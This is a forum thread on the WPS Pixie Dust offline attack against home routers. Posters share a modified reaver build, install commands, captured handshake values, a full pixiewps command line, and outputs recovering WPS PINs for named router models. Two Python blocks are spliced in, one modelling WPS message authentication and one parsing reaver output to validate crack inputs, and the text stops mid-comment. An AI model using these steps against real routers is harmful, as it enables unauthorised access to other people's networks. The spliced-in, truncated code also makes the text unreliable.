
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #1
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Datahead and I began digging into Netgear routers' source and found some interesting bits of information. We think that we might have found how the actual pin is generated... simply with a defined rand() function. It looks as if it uses the dev password (which can be found in the M1 packet in a WPS transaction) and has something to do with the system time. We are looking for help from crypto people who know what they are doing. It looks promising; the same thing was found in 2/2 checked source codes so far: WNDR3400v2 and R6300v1.

  2. #2
    Very interesting what you say about Netgear... are you talking about the cg3100 series?
    And... *** with the router with 2 PINs enabled? How did they manage that.... Incredible...
    Very good work guys, it is impressive.

  3. #3
    Join Date
    2014-Nov
    Posts
    8
    I believe when the PIN is enabled, the PIN on the back is active, but when it is disabled, that stated PIN is enabled. Any thoughts on this?

  4. #4
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by SubZero5 View Post
    I believe when the PIN is enabled, the pin on the back is active but when it is disabled, that stated PIN is enabled. Any thoughts on this?
    No, they actually both work at the same time. It seems to just be a secret pin...

    Quote Originally Posted by wn722 View Post
    copy.
    How do you guys get the keys out of pcap file?
    just use wireshark?
    Well, everything but the Authkey can be found in Wireshark. You can download the modified version of reaver that prints the Authkey, Enrollee Nonce, E-Hash1 and E-Hash2 here. The rest you need to find in a cap file/Wireshark. This was made following wiire's advice from a previous post!


    The PKE and PKR (public keys) are in the M1 and M2 messages. The M1 contains a "Public Key", which is the PKE, and the M2 also contains a "Public Key", but this key is different... aka the PKR. (Just right click and copy the values.)

    If you can give me all this data, that would help A LOT in testing. Print it just like this:

    Code:
    N1 Enrollee Nonce: 
    Authkey: 
    PKE: 
    PKR: 
    E-Hash1: 
    E-Hash2:
    And optional (but very helpful) information:
    Code:
    Manufacturer: 
    Model Number:
    Hardware Version:
    All you have to do is:
    Code:
    cd /path/to/reaver-wps-fork/src
    ./configure
    make
    make install
    Then you should be good to find data
    Last edited by soxrok2212; 2015-03-31 at 00:48.

  5. #5
    Join Date
    2013-Jul
    Posts
    844
    Install matters for reaver download

    Go to the src folder

    To avoid a file permission error type

    chmod 755 configure

    then

    ./configure

    make

    make install


    If you get the following error

    checking for pcap_open_live in -lpcap... no
    error: pcap library not found!

    Then install these two(2) files:


    sudo apt-get install libpcap-dev

    sudo apt-get install libsqlite3-dev


    then

    ./configure

    make

    make install

    Program ran fine after this

    Great Stuff Soxrox2212!!!

  6. #6
    Haven't had a chance to test the PIN, but here is what I got.

    Code:
    Arris - DG1670AB2
    
    N1 Enrollee Nonce: 5b:21:6e:79:7f:3d:76:ff:b0:d7:90:69:33:bc:d3:d7
    Authkey: 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa:d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c
    PKE: d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5:75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2:c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c:b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:35:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72:c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5:26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:fa:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09:23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d:79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d9:f8:68:80:11:55:d7:44:6a
    PKR: bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1:d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:36:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7:79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0:c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:93:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b:33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36:24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:ca:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48:c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4:a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:01:a4:29:77:a9:d4:81:d4:0e
    E-Hash1: 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba:ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38
    E-Hash2:b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5:6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec
    
    PIN Found- 04847533

  7. #7
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by psicomantis View Post
    Haven't had a chance to test the PIN, but here is what I got.

    Code:
    Arris - DG1670AB2
    
    PIN Found- 04847533
    This is what I got:

    root@Kali:~# pixiewps -a 7f:de:11:b9:69:1c:de:26:4a:21:a4:6f:eb:3d:b8:aa:aa :d7:30:09:09:32:b8:24:43:9b:e0:91:78:e7:6f:2c -e d4:38:91:0d:4e:6e:15:fe:70:f0:97:a8:70:2a:b8:94:f5 :75:74:bf:64:19:9f:92:82:9b:e0:2c:c0:a3:75:48:08:8 f:63:0a:82:37:0c:b7:95:42:cf:55:ca:a5:f0:f7:6c:b2: c7:5f:0e:23:18:44:f4:2d:00:f1:da:d4:94:23:56:c7:2c :b0:f6:87:c7:77:d0:cc:11:35:cf:b7:4f:bc:44:8d:ca:3 5:8a:78:3d:99:7f:2b:cf:44:21:d8:e2:0f:3c:7d:a4:72: c8:03:6f:77:2a:e9:fa:c1:e9:a8:2c:74:65:99:5a:e0:a5 :26:d9:23:5e:4e:ec:5a:07:07:ab:80:db:3f:5f:18:7f:f a:fa:f1:57:74:b2:8d:a9:97:a6:c6:0a:a5:e0:ec:93:09: 23:67:f6:3e:ec:1f:55:32:a4:5d:73:8f:ab:91:74:cf:1d :79:85:12:c1:81:f5:ea:a6:68:9d:8e:c7:c6:be:01:dc:d 9:f8:68:80:11:55:d7:44:6a -r bc:ad:54:2f:88:44:7c:12:69:ef:34:31:4a:17:1c:92:b1 :d7:06:4c:73:be:9f:d3:ed:87:63:74:10:46:0f:46:8c:3 6:b5:d4:a0:ba:af:85:9c:b2:30:42:d7:59:43:75:5a:d7: 79:96:fb:ee:7b:66:db:b7:a8:f9:22:9c:a5:d3:b8:e7:c0 :c4:5c:58:34:1f:56:a8:1a:41:a8:d2:e8:f6:3e:c9:3a:9 3:d9:9b:59:5c:a8:e0:78:84:6c:fc:05:e8:76:a3:e6:3b: 33:94:4a:a9:ff:50:fb:60:fa:97:3b:6d:cc:04:f1:5e:36 :24:a9:06:7a:f8:6b:00:e9:71:9d:89:be:9c:b2:9c:1f:c a:6d:d6:4d:ab:46:3d:b3:11:1f:8d:40:f7:c8:a4:39:48: c5:ca:1b:f6:30:95:7d:d9:68:41:ef:0a:37:b2:4a:37:e4 :a4:b0:dd:7e:c1:af:3e:66:ea:bf:16:0a:7a:8a:05:00:0 1:a4:29:77:a9:d4:81:d4:0e -s 90:5f:f5:7d:93:e5:c4:3c:62:0d:26:65:dd:59:57:d5:ba :ba:f1:b7:30:91:72:7c:54:94:38:08:1e:13:35:38 -z b0:2b:07:50:28:e7:6e:5f:fa:27:1b:31:92:85:43:cb:c5 :6a:ec:73:e2:27:c3:b9:80:ec:5b:ed:88:f0:1e:ec

    [%] Progress: 0% 100%
    [*] Time taken: 0 s
    [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [*] PSK1: d4:eb:0c:2a:38:15:e1:a0:3d:70:db:74:31:eb:53:a3
    [*] PSK2: d3:b7:e6:23:f3:1d:22:0a:23:ea:07:bb:7f:76:65:8b

    [+] WPS pin: 04840753

  8. #8
    Join Date
    2013-Jul
    Posts
    844
    To Soxrox2212

    We see your written reaver program provides the Enrollee nonce

    The problem we are having is with the -pke and -pkr keys. When we capture the M1 and M2 messages with Wireshark, the message is too long. Note in the working example published in these threads the length of the -pke string was 384. Our captures are twice that long.

    The string length of the -ak, -hash1 and -hash2 values is 64.

    A breakdown of M1 and M2 can be found at:

    https://briolidz.wordpress.com/2012/...ted-setup-wps/

    Enrollee -> Registrar: M1 = Version || N1 || Description || PKE
    Enrollee <- Registrar: M2 = Version || N1 || N2 || Description || PKR [ || ConfigData ] || HMAC_AuthKey(M1 || M2*)

    • || this symbol means concatenation of parameters to form a message.
    • Mn* is message Mn excluding the HMAC-SHA-256 value.
    • Version identifies the type of Registration Protocol message.
    • N1 is a 128-bit random number (nonce) specified by the Enrollee.
    • N2 is a 128-bit random number (nonce) specified by the Registrar.
    • Description contains a human-readable description of the sending device (UUID, manufacturer, model number, MAC address, etc.) and device capabilities such as supported algorithms, I/O channels, Registration Protocol role, etc. Description data is also included in 802.11 probe request and probe response messages.

    Our understanding is we must strip off parts of the M1 and M2 messages; is this correct?
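The M1/M2 composition quoted above, carried through in Python as an added illustration (not code from this post, the linked breakdown, or any of the tools in the thread): build_m1 and build_m2 follow the concatenation formulas as written, the authenticator is HMAC-SHA-256 keyed with AuthKey over M1 || M2* and truncated to 8 bytes as the WSC specification does, and the Version byte, description string and 192-byte public keys are constructed placeholders rather than real DH values. It also shows why the AuthKey cannot be read off a capture: it is a derived key that both ends compute and never send.

```python
import hashlib
import hmac
import os

# Sizes from the M1/M2 breakdown above: 128-bit nonces and 1536-bit DH public
# keys (192 bytes, i.e. the 384 hex characters asked about in this post).
NONCE_LEN = 16
PUBKEY_LEN = 192
# WSC keeps only the first 64 bits of the HMAC-SHA-256 as the Authenticator
# attribute (WSC spec; the thread itself does not state the truncation).
AUTH_LEN = 8


def build_m1(version: bytes, n1: bytes, description: bytes, pke: bytes) -> bytes:
    """M1 = Version || N1 || Description || PKE"""
    if len(n1) != NONCE_LEN or len(pke) != PUBKEY_LEN:
        raise ValueError("bad N1 or PKE length")
    return version + n1 + description + pke


def authenticator(authkey: bytes, previous: bytes, current_star: bytes) -> bytes:
    """HMAC_AuthKey(M(n-1) || Mn*): keyed with the AuthKey that both ends derive from
    the DH exchange, so it never appears on the wire and cannot be read off a pcap."""
    return hmac.new(authkey, previous + current_star, hashlib.sha256).digest()[:AUTH_LEN]


def build_m2(authkey: bytes, version: bytes, m1: bytes, n1: bytes, n2: bytes,
             description: bytes, pkr: bytes, config_data: bytes = b"") -> bytes:
    """M2 = Version || N1 || N2 || Description || PKR [|| ConfigData] || HMAC_AuthKey(M1 || M2*)"""
    if len(n1) != NONCE_LEN or len(n2) != NONCE_LEN or len(pkr) != PUBKEY_LEN:
        raise ValueError("bad nonce or PKR length")
    m2_star = version + n1 + n2 + description + pkr + config_data
    return m2_star + authenticator(authkey, m1, m2_star)


def verify_m2(authkey: bytes, m1: bytes, m2: bytes) -> bool:
    """Enrollee-side check: recompute the tag over M1 || M2* and compare in constant time."""
    m2_star, tag = m2[:-AUTH_LEN], m2[-AUTH_LEN:]
    return hmac.compare_digest(tag, authenticator(authkey, m1, m2_star))


def demo() -> dict:
    """Constructed exchange with random nonces, placeholder public keys and a random
    AuthKey; shows that the tag binds M2 to the exact M1 that was sent."""
    authkey = os.urandom(32)
    version, desc = b"\x10", b"constructed-description"
    n1, n2 = os.urandom(NONCE_LEN), os.urandom(NONCE_LEN)
    pke, pkr = os.urandom(PUBKEY_LEN), os.urandom(PUBKEY_LEN)  # placeholders, not real DH values
    m1 = build_m1(version, n1, desc, pke)
    m2 = build_m2(authkey, version, m1, n1, n2, desc, pkr)
    tampered_m1 = m1[:-1] + bytes([m1[-1] ^ 0x01])  # flip one bit of PKE after the fact
    return {
        "valid": verify_m2(authkey, m1, m2),
        "m1_tampered": verify_m2(authkey, tampered_m1, m2),
        "wrong_key": verify_m2(os.urandom(32), m1, m2),
        "pke_hex_len": len(pke.hex()),
    }
```

Real WSC messages carry these fields as TLV attributes rather than a bare concatenation, so the byte layout differs from this sketch even though the authenticator formula is the same.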

  9. #9
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by mmusket33 View Post
    To Soxrox2212

    Our understanding is we must strip off parts of the M1 and M2 message is this correct?
    All you should have to do is open wireshark, navigate to the M1 and M2 messages, then scroll to the public keys and copy the values for those keys... I'd upload a screenshot but the formatting requirements to upload are whack...
    Last edited by soxrok2212; 2015-03-31 at 03:13.

  10. #10
    Join Date
    2013-Jul
    Posts
    844
    MTeams are stumbling through this attack, testing on three (3) different computers.

    Here is an administrative problem to watch out for.

    1. When running the new reaver program provided by soxrox2212 you should see additional text data.

    Such as:

    Starting Cracking Session....

    > N1 Enrollee Nounce: ....

    >Auth Key....

    If you just see normal reaver output stop reaver and make sure the Network-Manager Icon has both

    Enable Networking
    Enable Wireless

    checked. If that does not work restart the computer.

    Some laptops will not provide this output unless these two(2) items are functioning.

  11. #11
    hey, I'm testing it with a TP-Link device on a WN722N USB dongle (Atheros)
    Code:
    Atheros Communications, Inc. AR9271 802.11n
    and nothing comes up with the wpsOffline script.
    can anyone ping me the pixiewps.c version?
    the link on Dropbox is dead

    p.s.
    on some routers the PKE comes up as
    Code:
    00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    cheers.

    my data is
    Code:
    > AuthKey: 89:90:f7:93:61:95:eb:3b:36:5e:6e:31:b9:e6:cc:76:e4:20:8b:b9:a6:65:00:de:0a:d4:2e:06:70:64:5c:46
    [+] Sending M2 message
     > E-Hash1: 9b:21:69:1d:bd:94:16:b5:b6:53:74:76:48:88:69:ed:e4:ae:30:95:82:22:4f:fa:a5:3c:56:19:45:f5:3e:ac
     > E-Hash2: 22:ac:97:70:3d:c0:e6:2d:28:d4:9e:61:f7:92:d2:8b:c8:59:6b:8d:14:c9:cb:15:93:76:b7:4b:19:b2:a3:95
    
    M1 PKE - 82:ea:40:37:43:42:0b:a5:56:8e:48:50:c3:d7:ce:8b:9d:79:c8:0e:c8:01:a7:e0:45:e9:53:35:2b:e1:f9:76:e0:bd:bf:4d:9a:32:be:84:86:88:03:ca:55:61:ef:e9:af:a9:f7:99:b2:98:40:a9:cc:37:15:be:79:19:57:69:02:ac:4b:7c:11:ba:e5:3f:b6:e9:89:e9:c0:6d:0e:ac:50:d1:04:d7:f4:35:04:ec:3c:7d:0d:16:e7:c7:1b:e8:0f:37:90:7b:91:f8:3a:64:22:af:4c:9e:3c:ff:68:7c:c1:b1:b1:00:0c:ba:83:5d:18:28:b5:7b:ca:86:00:97:ff:1f:00:6e:0c:eb:6f:c2:62:85:b5:4a:19:28:b3:67:81:4b:bb:22:74:d0:ac:5e:0a:d1:91:66:cd:1b:28:76:8e:57:a1:16:af:2d:a9:ad:a1:f1:d0:fa:c6:91:5d:be:c0:d3:fb:73:d1:9a:37:47:23:64:fc:88:aa:08:01:c9
    M2 PKR - 38:e3:db:ae:9c:ce:35:98:7c:f3:c8:61:ab:4d:8d:08:ef:ba:73:73:a3:bf:18:b8:e4:1b:13:62:6e:e9:9a:d8:d6:7b:fc:d0:ed:7b:55:19:2e:ff:43:e1:3b:9e:1e:bd:c8:60:29:6a:03:a1:c9:cf:47:18:0c:d6:f7:3c:32:86:27:a4:1d:77:d7:0d:0d:48:02:1e:15:81:de:0a:2c:71:3f:fa:d1:da:eb:5e:95:e4:3d:b6:a6:39:d5:ab:f8:d3:8d:d5:91:fa:b0:ac:07:51:67:2b:56:f2:39:2f:12:00:f2:42:21:8a:5f:60:1a:98:e4:f7:42:7c:b4:1c:6d:0a:1f:b3:9c:66:bf:8d:8b:27:57:04:f9:e5:c1:b9:38:4f:f6:6d:65:ec:45:dd:23:b7:72:09:91:38:f9:48:59:6e:0c:8c:df:57:10:0a:18:8b:39:d7:bb:bf:19:22:c5:98:cd:a3:28:62:c8:4f:d2:fa:8d:9f:0a:db:57:bb:26:a5
    Last edited by wn722; 2015-03-31 at 15:51.

  12. #12
    big ups soxrox and musket for explanations.

  13. #13
    Join Date
    2014-Apr
    Posts
    8
    Quote Originally Posted by wn722 View Post
    big ups soxrox and musket for explanations.
    If wpsOffline does not print anything, that means PIN NOT FOUND! The router is not taking ES1=ES2 as zero.

    The C code I hosted right here: https://bitbucket.org/dudux/wpsoffli...ode/?at=master
    But it will give you the same result. Basically the attack is pretty much the same.

  14. #14
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    That version of pixiewps is deprecated. A new version should be released soon by the author wiire.

  15. #15
    ok,
    is it AP chipset specific? or firmware?

  16. #16
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by wn722 View Post
    ok,
    is it AP chipset specific? or firmware?
    Both. If the vendor didn't change the WPS implementation then it is chipset specific, but the AP manufacturer may have changed that. Usually they don't however.

  17. #17
    I see.
    One more question: these keys (AK, PKE, PKR, E-Hash1/2), do they need to be part of the same conversation?
    Or is any key good?

  18. #18
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    They have to be from the same session. Aka pin 77755533's data will differ from 98949682's. The data is not interchangeable.
    Last edited by soxrok2212; 2015-04-01 at 14:13.

  19. #19
    I haven't been able to test the PIN of my initial capture, but tested this one today and it worked perfectly.

    Code:
    TG1672G32 
    
    N1 Enrollee Nonce: dd:0a:25:21:2c:55:e8:6b:39:67:cf:2f:6d:0b:d9:6e
    AuthKey: 54:19:47:34:ef:1a:79:5f:9a:29:2a:c2:fc:17:4a:74:78:bf:47:71:87:1e:30:27:67:3b:ef:32:58:b7:2b:4c
    PKE: 7f:43:2b:4d:4b:ab:2e:63:60:a5:10:20:75:da:c8:b9:8b:1e:4c:ff:c3:c3:29:3a:4f:4e:16:53:dc:76:df:de:d8:6c:4e:35:28:82:c0:5c:f8:79:85:51:3c:a1:06:3c:a3:6a:84:b8:43:e1:28:29:9a:0e:98:38:d2:18:0c:e4:69:ff:d4:1e:c7:a2:8e:82:1a:84:16:e7:d4:a1:c2:f6:2d:9d:5d:3d:bf:82:73:be:26:74:14:69:82:f7:d5:ee:aa:32:77:ba:79:b0:55:88:fa:9a:61:f4:f7:5e:4f:d7:da:76:da:60:b4:cd:93:e0:53:dd:62:09:33:c3:56:48:3f:22:68:b2:46:12:a2:ea:a2:75:e2:be:57:9f:86:fb:5b:bf:03:f7:2d:37:d2:10:c8:26:8d:d2:d5:b1:4a:f6:2f:66:bd:25:2d:1f:ae:90:e2:b9:ee:78:da:5b:86:59:bb:57:67:a1:63:5e:c0:66:a3:5c:82:96:62:f7:7b:ed
    PKR: 0c:6d:d1:29:13:e7:b6:4c:ef:56:6e:19:4f:4d:e0:b6:5e:0f:8d:08:4d:32:af:bd:7c:75:ae:5b:15:a6:53:d7:4a:27:53:44:54:8f:18:5a:56:67:ff:a5:27:a1:a4:95:31:b5:57:af:d2:53:e2:8d:c4:b5:c2:eb:0f:b7:0c:43:82:10:aa:2f:b4:42:e5:b1:ed:a7:a1:f0:d0:50:1a:e4:69:ca:f7:a9:da:b9:ff:86:6f:68:59:61:e1:37:19:de:50:51:bd:dd:60:ef:85:a8:e2:90:64:03:24:a6:c2:9d:e4:6d:09:92:11:52:30:4c:9e:b4:2e:a8:fe:be:f8:88:7c:f4:ae:eb:57:40:b7:8f:8b:5d:f7:62:5a:bf:80:21:46:e9:83:28:95:f1:58:d9:26:f5:c6:2a:bf:83:ab:a5:eb:ac:ee:e0:96:5e:06:9f:0e:ca:06:32:2a:72:57:95:b6:dd:67:d4:f7:56:98:9b:fa:ba:51:88:e8:a7:08:34
    E-Hash1: 36:7c:e3:7e:cc:75:74:f6:88:1a:6b:7d:06:15:ef:d8:2c:eb:d9:d6:07:b8:2d:68:4b:ec:25:8f:3e:14:15:07
    E-Hash2: 55:c7:18:2b:c6:ed:87:de:95:d2:98:19:2e:69:f9:0e:65:a9:d0:02:5e:ed:9c:24:d4:ce:2a:63:14:61:46:56
    
    [+] Pin cracked in 15 seconds
    [+] WPS PIN: '31335492'

  20. #20
    edited **************8
    Last edited by wn722; 2015-04-01 at 15:51.

  21. #21
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Well you can compare the enrollee nonce that reaver prints with the enrollee nonce in wireshark... then you can assume the rest of the data is matching and you are looking at the right session. Don't compare PKE or PKR values as some APs reuse DH Keys!

  22. #22
    nah, i was just being thick - all it takes is to run reaver with one pin attempt.
    I'm assuming you get all the data from one try though

  23. #23
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Yes you are correct

  24. #24
    anyone tried TP-Link devices?
    I got some 740,841 and it's zip.

  25. #25
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?

  26. #26
    Quote Originally Posted by soxrok2212 View Post
    There have been a few vulnerable ones. Are you saying you have a zip file that you want tested?
    no, I meant I'm getting nothing when running it against the script.
    I didn't see any TP-Link in the list of supported devices.

  27. #27
    Join Date
    2015-Aug
    Posts
    4
    Quote Originally Posted by wn722 View Post
    anyone tried TP-Link devices?
    I got some 740,841 and it's zip.
    I've tried many times with TP-Link devices and had no luck...
    When I was playing with Wireshark and looking, TP-Link chipsets mostly use Atheros.

  28. #28
    Join Date
    2013-Jul
    Posts
    844
    More reaver/bully reinstall problems with pixiedust mod

    Musket Team labs did a fresh HD install of kali-linux, then apt-get upgrade/apt-get install, then loaded the pixie dust modded bully and reaver. First note our comments in threads above for the reaver install concerning libpcap-dev and libsqlite3-dev.

    In addition:

    When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.

    You will also find that when reinstalling bully that you get an openssl error message and a failed reinstall.


    To correct this get an internet connection then:

    apt-get install libssl-dev


    Run wireshark and reaver and the public key for M2 will be seen.

    Install bully and the install process proceeds with no errors.

    Musket Teams Labs
    Last edited by mmusket33; 2015-04-02 at 02:51.

  29. #29
    Quote Originally Posted by mmusket33 View Post
    When reinstalling reaver with the pixie-dust mode you may find in wireshark that the M2 public key is always ......000000002 for ALL targets.
    You get PKR: 00:00 [...] 00:02 when using '-S' ('--dh-small') option.

    @wn722
    The very first AP I tested was a TP-LINK (see my first 2 posts). But I haven't written down the model.

  30. #30
    @wiire
    hm, can you look it up?
    also did you use wpsOffline or pixiewps script?

  31. #31
    Join Date
    2013-Jul
    Posts
    844
    To Wiire - Yes, we ran a test and you are correct. This then leads to the obvious question.

    1. Will a pixie dust attack work with DH small data?

    2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.


    MTeams

  32. #32
    Quote Originally Posted by mmusket33 View Post
    1. Will a pixie dust attack work with DH small data?

    2. If it does then we can just run a DH small attack. This would mean that the pkr variable would always be constant.
    I was getting the 00:00:xx:02 PK every now and then running with bare reaver. With the -N -L -S options it was fixed.

  33. #33
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I will try to see if small DH keys work later today. I don't expect it to, however, but it is certainly worth a try.

  34. #34
    Quote Originally Posted by soxrok2212 View Post
    I will try to see if small DH Keys work later today. I don't expect it to however, but it is certain worth a try.
    Of course it works.

    I added the -S option to pixiewps so we don't need to print PKR on screen or get it on Wireshark.

    @wn722
    I only use my program, pixiewps.

  35. #35
    Quote Originally Posted by wiire View Post

    @wn722
    I only use my program, pixiewps.
    can you share a link?
    cheers.

  36. #36
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by wn722 View Post
    can you share a link?
    cheers.
    It will be out along with a video demo sometime this week.

  37. #37
    Pixiewps is out!

    Link to the pixiewps thread.

  38. #38 Modified Reaver Not Showing Public Key (PKE)..

    Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
    [+] Received M1 message
    > AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40:27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
    [+] Sending M2 message
    > E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03:0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
    > E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c:00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    [+] Trying pin 01235678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
    [+] Received M1 message
    > AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e:5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
    [+] Sending M2 message
    > E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a:c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
    > E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75:e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3

  39. #39
    cool.
    does it matter if you use dec format or just plain string?

    af:75:f6:2c:eb:08:c3:f9:71:72:22:92:04:6f:cd:0c
    vs
    af75f62ceb08c3f971722292046fcd0c

  40. #40
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I'm pretty sure both work.
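A Python helper, added here and not part of any poster's tools, that reads reaver output of the form quoted in this thread, accepts either hex format (post #39), checks the byte lengths the thread quotes (post #8), keeps each PIN attempt's values together so they are never mixed across sessions (posts #18 and #21), and flags the all-zero PKR that reaver -S sends (post #29). The sample log is constructed: attempt 1 reuses values quoted in post #38, attempt 2 is deliberately damaged to exercise the checks.

```python
import re
from dataclasses import dataclass, field

# Byte lengths the thread quotes: 128-bit nonce; 256-bit AuthKey and E-Hashes
# (64 hex chars); 1536-bit DH public keys PKE/PKR (384 hex chars, post #8).
EXPECTED_LEN = {"nonce": 16, "authkey": 32, "e_hash1": 32, "e_hash2": 32, "pke": 192, "pkr": 192}
REQUIRED = ("nonce", "authkey", "e_hash1", "e_hash2")  # PKE/PKR may be taken from Wireshark instead
FIELD_PATTERNS = {name: re.compile(rx + r"\s*[:-]\s*(.+)$", re.I) for name, rx in {
    "nonce": r"Enrollee Nou?nce", "authkey": r"Auth\s*Key", "e_hash1": r"E-Hash1",
    "e_hash2": r"E-Hash2", "pke": r"\bPKE", "pkr": r"\bPKR"}.items()}

def normalize_hex(value: str) -> bytes:
    """Accept 'af:75:...' or 'af75...' (post #39) and drop the stray spaces
    that forum line-wrapping inserts into long values."""
    return bytes.fromhex(re.sub(r"[\s:]", "", value))

def is_small_dh_pubkey(pk: bytes) -> bool:
    """PKR = 00:00 [...] 00:02 is what reaver -S/--dh-small sends (post #29):
    the DH public value is literally the integer 2."""
    return int.from_bytes(pk, "big") == 2

@dataclass
class Session:
    pin: str = ""
    fields: dict = field(default_factory=dict)     # field name -> bytes
    problems: list = field(default_factory=list)
    small_dh: bool = False

def validate(s: Session) -> None:
    """Record missing required fields and wrong lengths; flag a small-DH PKR."""
    for name, expected in EXPECTED_LEN.items():
        val = s.fields.get(name)
        if val is None and name in REQUIRED:
            s.problems.append(f"{name}: missing")
        elif val is not None and len(val) != expected:
            s.problems.append(f"{name}: {len(val)} bytes, expected {expected}")
    s.small_dh = "pkr" in s.fields and is_small_dh_pubkey(s.fields["pkr"])

def parse_reaver_output(text: str) -> list:
    """One Session per 'Trying pin' attempt: the values are only usable together
    when they come from the same exchange (post #18), and the enrollee nonce is
    the field to match against a Wireshark capture (post #21)."""
    sessions, current = [], None
    for raw in text.splitlines():
        line = raw.strip().lstrip(">").strip()
        if m := re.search(r"Trying pin (\d+)", line):
            sessions.append(current := Session(pin=m.group(1)))
            continue
        for name, pat in FIELD_PATTERNS.items():
            if m := pat.search(line):
                if current is None:  # values pasted without a 'Trying pin' header
                    sessions.append(current := Session())
                current.fields[name] = normalize_hex(m.group(1))
    for s in sessions:
        validate(s)
    return sessions

# Constructed sample: attempt 1 copies the values quoted in post #38 (keeping the
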